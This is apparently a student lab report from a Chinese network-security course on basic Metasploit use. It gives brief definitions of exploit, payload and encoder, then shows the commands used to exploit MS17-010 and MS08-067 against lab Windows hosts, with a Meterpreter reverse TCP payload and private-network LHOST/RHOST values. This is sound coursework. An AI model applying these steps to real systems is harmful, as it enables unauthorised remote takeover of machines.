2018-2019-2 20165303《網絡攻防技術》Exp5 MSF基礎應用
阿新 • • 發佈:2019-04-13
進行 erp alt 基礎應用 1.2 enc 通道 編碼 技術分享
實踐目標
- 1.主動攻擊實踐ms17_010以及ms08_067
- 2.針對瀏覽器的攻擊ms13-008(唯一)以及ms11-050以及ms13-069(唯一)
- 3.針對客戶端的攻擊adobe (Adobe_toolbutton漏洞)
- 4.輔助模塊browser autopwn(唯一)
問題回答
- 什麽是exploit
用來打開攻擊者與被攻擊者的通道,將想要傳送的代碼傳到目標靶機中
- 什麽是payload
真正的攻擊代碼,執行負載的工具,exploit將他傳送到靶機後,執行程序
- 什麽是encode
encode也就是編碼,改變代碼的形式,使其不容易被發現,為了隱藏並為後面的操作進行鋪墊
任務一 主動攻擊實踐ms17_010以及ms08_067
ms17-010
- 首先搜索ms17-010
- 然後設置payload
set payload windows/x64/meterpreter/reverse_tcp
- 然後設置攻擊主機和目標靶機
set lhost 192.168.1.154
set rhost 192.168.1.192
- 輸入exploit進行攻擊
- 我設置的攻擊靶機是Windows server2008,可以成功攻擊
ms08-067
- 首先
use exploit/windows/smb/ms08_067_netapi
- 輸入
show options
看一下需要設置哪些
然後輸入
show payloads
看一下有什麽負載
- 設置lhost 192.168.1.154
設置rhost 192.168.1.235
然後輸入
exploit
進行攻擊獲得權限
2018-2019-2 20165303《網絡攻防技術》Exp5 MSF基礎應用